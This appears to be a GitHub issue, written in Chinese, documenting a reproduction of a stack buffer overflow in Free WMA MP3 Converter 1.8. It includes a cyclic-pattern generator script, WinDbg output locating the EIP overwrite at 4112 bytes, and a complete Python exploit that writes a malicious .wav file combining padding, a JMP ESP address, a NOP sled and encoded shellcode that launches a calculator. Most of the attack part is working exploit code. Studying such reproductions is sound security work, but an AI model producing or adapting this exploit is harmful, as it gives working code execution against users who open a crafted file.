FREE WMA MP3 CONVERTER 1.8缓冲区溢出漏洞复现
xinali opened this issue · 0 comments
xinali commented
FREE WMA MP3 CONVERTER 1.8缓冲区溢出漏洞复现
漏洞概述
首先生成测试字符串
#encoding:utf-8
import sys
from pwnlib.util.cyclic import cyclic, cyclic_find
def usage():
print """
====================================================
[*] python genseq.py s/g arg"
example:
generate: python genseq.py g 1000
search: python genseq.py s abcd
====================================================
"""
if __name__ == "__main__":
if len(sys.argv) < 2:
usage()
sys.exit(1)
op = sys.argv[1]
try:
if op == 'g':
gen_len = sys.argv[2]
print cyclic(int(gen_len))
elif op == 's':
search_ch = sys.argv[2]
print cyclic_find(search_ch)
except Exception as ex:
print ex
usage()生成一个10000长度的wav文件,打开CONVERTER,并利用windbg附加
开始转换,程序崩溃
定位漏洞
kb查看调用栈
可以看到调用栈全被数据填充,根据eip定位溢出长度
0:003> .formats(eip)
Evaluate expression:
Hex: 61657062
Decimal: 1634037858
Octal: 14131270142
Binary: 01100001 01100101 01110000 01100010
Chars: aepb
Time: Tue Oct 12 04:24:18 2021
Float: low 2.64525e+020 high 0
Double: 8.07322e-315
利用上面的程序寻找一下:
python genseq.py s bpea
4112
可以看到当字符串长度达到4112时即可覆盖eip,程序并没有对传入的字符进行长度检查,所以可以构造shellcode
poc + eip + nops + shellcode
其中poc长度4112,eip地址为搜索到的jmp esp
利用其给出的shellcode测试
import struct
def little_endian(address):
return struct.pack("<L",address)
poc="\x41" * 4112
eip=little_endian(0x0045CD1A)#0045CD1A FFE4 JMP ESP
nops="\x90" * 80
shellcode=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
exploit = poc + eip + nops + shellcode
try:
rst= open("bof_WMA MP3 Converter.wav",'w')
rst.write(exploit)
rst.close()
except:
print "Error"弹出计算器
